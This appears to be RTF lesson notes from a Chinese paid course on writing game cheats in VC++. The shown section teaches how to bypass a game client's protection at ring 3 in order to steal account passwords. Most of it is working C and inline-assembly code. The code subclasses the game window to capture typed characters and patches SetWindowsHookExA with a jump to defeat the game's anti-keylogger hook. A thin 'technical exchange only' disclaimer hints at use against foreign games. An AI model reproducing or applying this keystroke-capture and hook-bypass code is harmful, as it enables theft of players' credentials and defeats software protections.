{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fmodern\fprq6\fcharset134 \'cb\'ce\'cc\'e5;}{\f1\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red0\green0\blue0;\red255\green0\blue0;\red0\green0\blue255;\red255\green0\blue255;\red160\green0\blue160;\red0\green0\blue119;\red128\green128\blue128;\red0\green153\blue0;\red136\green0\blue0;}
{\*\generator Msftedit 5.41.15.1515;}\viewkind4\uc1\pard\cf1\lang2052\f0\fs20\par
\pard\nowidctlpar\cf2\f1\'d3\'f4\'bd\'f0\'cf\'e3\'ec\'e1\'bc\'bc\'ca\'f5 \ul\'b1\'e0\'b3\'ccVIP\'bd\'cc\'b3\'cc\par
www.yjxsoft.com\par
\'d7\'a8\'d2\'b5\'b5\'c4\'b1\'e0\'b3\'cc\'bc\'bc\'ca\'f5\'c5\'e0\'d1\'b5\'bb\'f9\'b5\'d8 \par
\'ce\'d2\'c3\'c7\'b5\'c4\'bf\'da\'ba\'c5\'a3\'ba\'be\'f8\'b6\'d4\'b2\'bb\'d2\'bb\'d1\'f9\'b5\'c4\'bd\'cc\'b3\'cc\'a3\'a1\'be\'f8\'b6\'d4\'b2\'bb\'d2\'bb\'d1\'f9\'b5\'c4\'ca\'b5\'d5\'bd\'cc\'e5\'d1\'e9\'a3\'a1\'c7\'e5\'ce\'fa\'b5\'c4\'cb\'bc\'c2\'b7!\'cf\'b8\'d6\'c2\'c8\'ab\'c3\'e6\'b5\'c4\'bd\'b2\'bd\'e2\'a3\'a1\'c8\'c3\'c4\'e3\'b8\'d0\'b5\'bd\'d1\'a7\'cf\'b0\'d4\'ad\'c0\'b4\'bf\'c9\'d2\'d4\'d5\'e2\'c3\'b4\'bc\'f2\'b5\'a5\'a3\'a1\par
\'b6\'af\'bb\'ad\'bd\'cc\'b3\'cc\'d6\'bb\'ca\'c7\'c6\'f0\'b5\'bd\'bc\'bc\'ca\'f5\'bd\'bb\'c1\'f7\'d7\'f7\'d3\'c3.\'c7\'eb\'b4\'f3\'bc\'d2\'b2\'bb\'d3\'c3\'c0\'fb\'d3\'c3\'b4\'cb\'b7\'bd\'b7\'a8\'b6\'d4\'b9\'fa\'c4\'da\'b5\'c4\'d3\'ce\'cf\'b7\'d7\'f6\'c6\'c6\'bb\'b5.\par
\pard\'b9\'fa\'c8\'cb\'d3\'a6\'b8\'c3\'cd\'c5\'bd\'e1\'c6\'f0\'c0\'b4\'d2\'bb\'d6\'c2\'b6\'d4\'cd\'e2\'b2\'c5\'ca\'c7\'ce\'d2\'c3\'c7\'b5\'c4\'d4\'f0\'c8\'ce.\'d3\'c9\'b4\'cb\'b6\'af\'bb\'ad\'d4\'ec\'b3\'c9\'b5\'c4\'c8\'ce\'ba\'ce\'ba\'f3\'b9\'fb\'ba\'cd\'b1\'be\'d5\'be\'ce\'de\'b9\'d8.\ulnone\par
\'b1\'be\'bd\'cc\'b3\'cc\'ca\'d3\'c6\'b5\cf3 1024*768\cf2\'b7\'d6\'b1\'e7\'c2\'ca\'cf\'c2\'b9\'db\'bf\'b4\'d7\'ee\'bc\'d1\par
\par
\'b4\'f3\'bc\'d2\'ba\'c3\'a3\'ac\'ce\'d2\'ca\'c7\'d3\'f4\'bd\'f0\'cf\'e3\'c0\'cf\'ca\'a6\'a3\'ba\cf4 QQ150330575\cf2\par
\'bb\'b6\'d3\'ad\'b4\'f3\'bc\'d2\'b2\'ce\'bc\'d3\'d3\'f4\'bd\'f0\'cf\'e3\'ec\'e1\'bc\'bc\'ca\'f5\cf3 VC++\'cd\'e2\'b9\'d2\'b1\'e0\'b3\'cc\'c5\'e0\'d1\'b5\'b0\'e0\cf2\'a1\'a3\'d4\'da\'bd\'d3\'cf\'c2\'c0\'b4\'b5\'c4\'d2\'bb\'b6\'ce\'ca\'b1\'bc\'e4\'bd\'ab\'d3\'c9\'ce\'d2\'ba\'cd\'b4\'f3\'bc\'d2\'d2\'bb\'c6\'f0\'d1\'a7\'cf\'b0\'cd\'e2\'b9\'d2\'b5\'c4\'b7\'d6\'ce\'f6\'a3\'ac\'d6\'c6\'d7\'f7\'a1\'a3\par
\cf3  \'d0\'a1\'b2\'e2\'ca\'d4\'a3\'ba\par
1.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'c8\'dd\'d2\'d7\'cb\'b5\'a3\'baXX\'d3\'ef\'d1\'d4\'b2\'bb\'d0\'d0\'c1\'cb\'a3\'ac\'d3\'a6\'b8\'c3\'d1\'a7YY\'a3\'bb\emdash\emdash\'ca\'c7\'c4\'e3\'d7\'d4\'bc\'ba\'b2\'bb\'d0\'d0\'c1\'cb\'b0\'c9\'a3\'a1\'a3\'bf \par
2.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'c8\'dd\'d2\'d7\'ce\'ca\'a3\'ba\'ce\'d2\'b5\'bd\'b5\'d7\'b8\'c3\'d1\'a7\'ca\'b2\'c3\'b4\'a3\'bb\emdash\emdash\'b1\'f0\'ce\'ca\'a3\'ac\'d1\'a7\'be\'cd\'b6\'d4\'c1\'cb\'a3\'bb \par
3.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'c8\'dd\'d2\'d7\'ce\'ca\'a3\'baXX\'d3\'d0\'c7\'ae\'cd\'be\'c2\'f0\'a3\'bb\emdash\emdash\'bd\'a8\'d2\'e9\'c4\'e3\'c8\'a5\'c7\'c0\'d2\'f8\'d0\'d0\'a3\'bb \par
4.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'c8\'dd\'d2\'d7\'cb\'b5\'a3\'ba\'ce\'d2\'d2\'aa\'d6\'d0\'ce\'c4\'b0\'e6\'a3\'a1\'ce\'d2\'d3\'a2\'ce\'c4\'b2\'bb\'d0\'d0\'a3\'a1\emdash\emdash\'b2\'bb\'d0\'d0\'a3\'bf\'d1\'a7\'d1\'bd\'a3\'a1 \par
5.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'c8\'dd\'d2\'d7\'ce\'ca\'a3\'baXX\'ba\'cdYY\'c4\'c4\'b8\'f6\'ba\'c3\'a3\'bb\emdash\emdash\'b8\'e6\'cb\'df\'c4\'e3\'b0\'c9\'a3\'ac\'b6\'bc\'ba\'c3\emdash\emdash\'d6\'bb\'d2\'aa\'c4\'e3\'d1\'a7\'be\'cd\'d0\'d0\'a3\'bb \par
6.\'b8\'a1\'d4\'ea\'b5\'c4\'c8\'cb\'b7\'d6\'c1\'bd\'d6\'d6\'a3\'baa)\'d6\'bb\'b9\'db\'cd\'fb\'b6\'f8\'b2\'bb\'d1\'a7\'b5\'c4\'c8\'cb\'a3\'bbb)\'d6\'bb\'d1\'a7\'b6\'f8\'b2\'bb\'bc\'e1\'b3\'d6\'b5\'c4\'c8\'cb\'a3\'bb \par
7.\'b0\'d1\'ca\'b1\'f7\'d6\'b5\'c4\'bc\'bc\'ca\'f5\'b9\'d2\'d4\'da\'d7\'ec\'b1\'df\'a3\'ac\'bb\'b9\'b2\'bb\'c8\'e7\'b0\'d1\'b9\'fd\'ca\'b1\'b5\'c4\'bc\'bc\'ca\'f5\'bc\'c7\'d4\'da\'d0\'c4\'c0\'ef\'a3\'bb \par
\'b2\'ce\'bf\'bc\'a3\'ba\par
\cf4\ul\b www.yjxsoft.com\par
\par
\pard\nowidctlpar\ulnone  4.3.2 ring3\'b2\'e3\'b9\'fd\'b1\'a3\'bb\'a4\'c7\'d4\'c3\'dc\'d5\'cb\'ba\'c5\'c3\'dc\'c2\'eb\par
          a\'a1\'a2\'b9\'fd\'c3\'dc\'c2\'eb\'b1\'a3\'bb\'a4\'d4\'ad\'c0\'ed\par
          b\'a1\'a2\'b4\'fa\'c2\'eb\'b2\'e2\'ca\'d4\par
          c\'a1\'a2in line hook\par
\'b9\'b4\'d7\'d3\'cc\'d8\'d0\'d4\'a3\'ba\'ba\'f3\'b0\'b2\'d7\'b0\'a3\'ac\'bf\'c9\'d2\'d4\'cf\'c8\'b4\'a6\'c0\'ed\'cf\'fb\'cf\'a2\par
\pard\cf3 #define \cf5 GameCaption\cf1  \cf6 "YB_OnlineClient"\cf1\par
\pard\nowidctlpar\cf7 WNDPROC\cf1  \cf7 oldproc\cf1 ;\par
\cf4\par
\pard\cf3 LRESULT\cf1  \cf5 CALLBACK\cf1  myproc(\par
  \cf3 HWND\cf1  \cf7 hwnd\cf1 ,      \cf8 // handle to window\cf1\par
  \cf3 UINT\cf1  \cf7 uMsg\cf1 ,      \cf8 // message identifier\cf1\par
  \cf3 WPARAM\cf1  \cf7 wParam\cf1 ,  \cf8 // first message parameter\cf1\par
  \cf3 LPARAM\cf1  \cf7 lParam\cf1    \cf8 // second message parameter\cf1\par
)\par
\{ \par
\tab  if (\cf7 uMsg\cf1 ==\cf5 WM_CHAR\cf1 )\par
 \{\par
  \cf7 page5\cf1 .\cf7 m_script\cf1 .\cf5 SendMessage\cf1 (\cf7 uMsg\cf1 ,\cf7 wParam\cf1 ,\cf7 lParam\cf1 ); \par
 \}\tab  \par
\tab return \cf5 CallWindowProc\cf1 (\cf7 oldproc\cf1 ,\cf7 hwnd\cf1 ,\cf7 uMsg\cf1 ,\cf7 wParam\cf1 ,\cf7 lParam\cf1 );\par
\pard\nowidctlpar\}\cf4\par
\pard\cf1\b0\f0\par
\tab\cf3 HWND\cf1  \cf7 gh\cf1 =\cf5 FindWindow\cf1 (\cf5 NULL\cf1 ,\cf5 GameCaption\cf1 );\cf8 //\'bb\'f1\'c8\'a1\'d3\'ce\'cf\'b7\'b4\'b0\'bf\'da\'be\'e4\'b1\'fa\cf1\par
        \cf7 oldproc\cf1 =(\cf7 WNDPROC\cf1 )\cf5 GetWindowLong\cf1 (\cf7 gh\cf1 ,\cf5 GWL_WNDPROC\cf1 );\par
       \cf5 SetWindowLong\cf1 (\cf7 gh\cf1 ,\cf5 GWL_WNDPROC\cf1 ,(\cf7 long\cf1 )myproc);\par
\par
\par
\cf2 //in line hook SetWindowsHookExA\par
\cf1\par
\tab\cf8 // TODO: Add your control notification handler code here\cf1\par
    \cf3 DWORD\cf1  \cf7 oldprotect\cf1 ;\par
\tab\cf3 HMODULE\cf1  \cf7 huser\cf1 =\cf5 GetModuleHandle\cf1 (\cf6 "User32.dll"\cf1 );\par
\tab\cf7 FARPROC\cf1  \cf7 hookaddr\cf1 =\cf9 GetProcAddress\cf1 (\cf7 huser\cf1 ,\cf6 "SetWindowsHookExA"\cf1 );\par
    \cf9 VirtualProtect\cf1 (\cf7 hookaddr\cf1 ,258,\cf5 PAGE_EXECUTE_READWRITE\cf1 ,&\cf7 oldprotect\cf1 ); \par
    \cf8 //\'d2\'aa\'d0\'b4\'c8\'eb\'b5\'c4\'b5\'d8\'d6\'b7 MySetWindowsHookEX-5-SetWindowsHookExA\cf1\par
\tab\cf7 int\cf1  \cf7 vaddr\cf1 =(\cf7 int\cf1 )MySetWindowsHookEx-5-(\cf7 int\cf1 )\cf7 hookaddr\cf1 ;//\'bc\'c6\'cb\'e3\'d2\'aa\'cc\'f8\'d7\'aa\'b5\'c4\'b5\'d8\'d6\'b7\par
\tab _asm\par
\tab\{\par
\tab\tab\cf7 mov\cf1  \cf7 eax\cf1 ,\cf7 hookaddr\cf1\par
\tab\tab\cf7 mov\cf1  [\cf7 eax\cf1 ],0xe9 //JMP\par
\tab\tab add \cf7 eax\cf1 ,1\par
\tab\tab\cf7 mov\cf1  \cf7 ebx\cf1 ,\cf7 vaddr\cf1\par
\tab\tab\cf7 mov\cf1  [\cf7 eax\cf1 ], \cf7 ebx\cf1\par
\tab\}\par
\tab\cf9 VirtualProtect\cf1 (\cf7 hookaddr\cf1 ,258,\cf7 oldprotect\cf1 ,&\cf7 oldprotect\cf1 );\par
\cf0\par
\par
\par
\par
\cf3 HHOOK\cf1  \cf7 mykb_hhk\cf1 ;\par
\cf3 LRESULT\cf1  \cf5 CALLBACK\cf1  MyKbProc(\par
  \cf7 int\cf1  \cf7 code\cf1 ,       \cf8 // hook code\cf1\par
  \cf3 WPARAM\cf1  \cf7 wParam\cf1 ,  \cf8 // virtual-key code\cf1\par
  \cf3 LPARAM\cf1  \cf7 lParam\cf1    \cf8 // keystroke-message information\cf1\par
)\par
\{\par
 \par
  \par
return \cf9 CallNextHookEx\cf1 (\cf7 mykb_hhk\cf1 ,\cf7 code\cf1 ,\cf7 wParam\cf1 ,\cf7 lParam\cf1 );\par
\}\par
\par
\cf3 HHOOK\cf1  \cf2 MySetWindowsHookEx\cf1 (\par
  \cf7 int\cf1  \cf7 idHook\cf1 ,        \cf8 // type of hook to install\cf1\par
  \cf3 HOOKPROC\cf1  \cf7 lpfn\cf1 ,     \cf8 // address of hook procedure\cf1\par
  \cf3 HINSTANCE\cf1  \cf7 hMod\cf1 ,    \cf8 // handle to application instance\cf1\par
  \cf3 DWORD\cf1  \cf7 dwThreadId\cf1    \cf8 // identity of thread to install hook for\cf1\par
)\par
\{\par
\cf8 /*\par
77D31211 > $  8BFF          MOV EDI,EDI\par
77D31213   ?  55            PUSH EBP\par
77D31214   ?  8BEC          MOV EBP,ESP\par
77D31216   .  6A 02         PUSH 2                                   ;  2\par
77D31218   .  FF75 14       PUSH DWORD PTR SS:[EBP+14]               ;  1354 threadID\par
77D3121B   .  FF75 10       PUSH DWORD PTR SS:[EBP+10]               ;  HModule\par
77D3121E   .  FF75 0C       PUSH DWORD PTR SS:[EBP+C]                ;  Hookproc\par
77D31221   .  FF75 08       PUSH DWORD PTR SS:[EBP+8]                ;  HOOKTYPE WH_keyboard=2\par
77D31224   .  E8 2E6FFFFF   CALL USER32.77D28157\par
77D31229   .  5D            POP EBP\par
77D3122A   .  C2 1000       RETN 10\par
\par
*/\cf1\par
 \cf8 //\'c5\'d0\'b6\'cf \'ca\'c7\'b2\'bb\'ca\'c7WH_KEYBOARD\cf1\par
if ( (\cf7 idHook\cf1 ==\cf5 WH_DEBUG\cf1 ))\par
\{\par
\tab _asm\par
\{\par
  PUSH 2\par
  PUSH \cf7 dwThreadId\cf1\par
  lea \cf7 eax\cf1 , MyKbProc \cf8 //\'d7\'d4\'bc\'ba\'b5\'c4\'b9\'b4\'d7\'d3\'bb\'d8\'b5\'f7\cf1\par
  push \cf7 eax\cf1\par
  PUSH \cf7 hMod\cf1  \par
  PUSH \cf7 idHook\cf1\par
  \cf7 mov\cf1  \cf7 eax\cf1 , 0x77D28157\par
  \cf7 call\cf1  \cf7 eax\cf1\par
  \cf7 mov\cf1  \cf7 mykb_hhk\cf1 ,\cf7 eax\cf1  \par
 \par
\}\par
\par
\par
\} else\par
\{\par
\tab\tab  \cf7 page5\cf1 .\cf7 m_edt_s_script\cf1 +=\cf6 "XX,"\cf1 ;\par
\tab\cf7 page5\cf1 .\cf9 UpdateData\cf1 (false);\par
_asm\par
\{\par
  PUSH 2\par
  PUSH \cf7 dwThreadId\cf1\par
  PUSH \cf7 lpfn\cf1  \par
  PUSH \cf7 hMod\cf1  \par
  PUSH \cf7 idHook\cf1\par
  \cf7 mov\cf1  \cf7 eax\cf1 , 0x77D28157\par
  \cf7 call\cf1  \cf7 eax\cf1\par
 \par
 \par
\}\par
\par
 \par
\tab if (\cf7 mykb_hhk\cf1 >0) \par
\tab\{\par
\tab\tab\cf9 UnhookWindowsHookEx\cf1 (\cf7 mykb_hhk\cf1 ); \cf8 //\'d0\'b6\'d4\'d8\cf1\par
    \cf7 page5\cf1 .\cf7 m_edt_s_script\cf1 +=\cf6 "A,"\cf1 ;\par
\tab\cf7 page5\cf1 .\cf9 UpdateData\cf1 (false);\par
\tab\cf5 MessageBox\cf1 (0,\cf6 "WH_KB"\cf1 ,\cf6 "KB"\cf1 ,\cf5 MB_OK\cf1 );\par
\tab\cf9 ExitProcess\cf1 (0);\par
\tab\}\par
\par
\par
 \par
  _asm \cf8 //\'d4\'d9\'b4\'ce\'d6\'d8\'d0\'c2\'b0\'b2\'d7\'b0\'a3\'ac\'d2\'d4\'c8\'b7\'b1\'a3\'d7\'d4\'bc\'ba\'b5\'c4\'b9\'b4\'d7\'d3\'ca\'c7\'d7\'ee\'b6\'a5\'b2\'e3\cf1\par
  \{\par
  PUSH 2\par
  PUSH \cf7 dwThreadId\cf1\par
  lea \cf7 eax\cf1 , MyKbProc \cf8 //\'d7\'d4\'bc\'ba\'b5\'c4\'b9\'b4\'d7\'d3\'bb\'d8\'b5\'f7\cf1\par
  push \cf7 eax\cf1\par
  PUSH \cf7 hMod\cf1  \par
  PUSH \cf7 idHook\cf1\par
  \cf7 mov\cf1  \cf7 eax\cf1 , 0x77D28157\par
  \cf7 call\cf1  \cf7 eax\cf1\par
  \cf7 mov\cf1  \cf7 mykb_hhk\cf1 ,\cf7 eax\cf1  \par
  \}\par
 \par
 \par
_asm \cf8 //\'bb\'d6\'b8\'b4\cf1\par
\{\par
  pop ebp\par
  ret 0x10\par
\}\par
\}\}\cf0\par
}
 